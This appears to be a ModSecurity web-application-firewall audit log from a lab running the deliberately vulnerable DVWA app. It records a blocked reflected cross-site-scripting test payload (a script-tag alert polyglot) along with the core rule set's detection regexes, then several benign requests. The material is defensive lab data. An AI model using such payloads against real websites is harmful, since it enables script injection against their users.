[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":585,"p2":3331,"p3":0,"p4":0,"p5":150,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4RwAAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:30:21 GMT","ETag":"\"1d0-54f6a5695262a\"","Accept-Ranges":"bytes","Content-Length":"464","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0n38AAQEAAAkW4RwAAAAB\"]"],"stopwatch":{"p1":398,"p2":1073,"p3":72,"p4":149,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R0AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R0AAAAB\"]"],"stopwatch":{"p1":476,"p2":857,"p3":45,"p4":381,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R4AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R4AAAAB\"]"],"stopwatch":{"p1":719,"p2":1197,"p3":47,"p4":247,"p5":52,"sr":104,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkYuE8AAAAD","remote_address":"192.168.75.145","remote_port":56790,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkYuE8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":396,"p2":2261,"p3":105,"p4":538,"p5":135,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkZ0BMAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkZ0BMAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":611,"p2":2509,"p3":98,"p4":481,"p5":74,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BQAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BQAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":632,"p2":2175,"p3":98,"p4":396,"p5":65,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
